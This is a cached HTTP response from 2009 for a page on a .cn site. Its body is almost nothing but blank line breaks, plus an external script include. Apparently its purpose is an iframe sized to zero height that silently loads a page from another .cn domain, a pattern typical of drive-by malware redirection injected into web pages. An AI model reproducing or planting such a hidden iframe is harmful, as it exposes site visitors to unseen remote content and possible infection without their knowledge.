HTTP/1.1 200 OK
Content-Length: 271
Date: Thu, 26 Feb 2009 05:36:28 GMT
Last-Modified: Thu, 26 Feb 2009 05:35:43 GMT
Content-Type: text/html
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Polipo-Location: http://www.good2056.cn/yhyw/2.htm
X-Polipo-Date: Thu, 26 Feb 2009 05:47:24 GMT
X-Polipo-Access: Thu, 26 Feb 2009 05:47:24 GMT

 <br>
<br>
<br><br>
<iframe src=http://www.sll9012.cn/a10/fxx.htm width=100 height=0></Iframe>
<br><br><br>
<br><br>
<br>
<br>
<br>
<br><br>
<br>
<br>
<br>


<script type="text/javascript" src="http://js.tongji.cn.yahoo.com/857114/ystet.js"></script>
<br>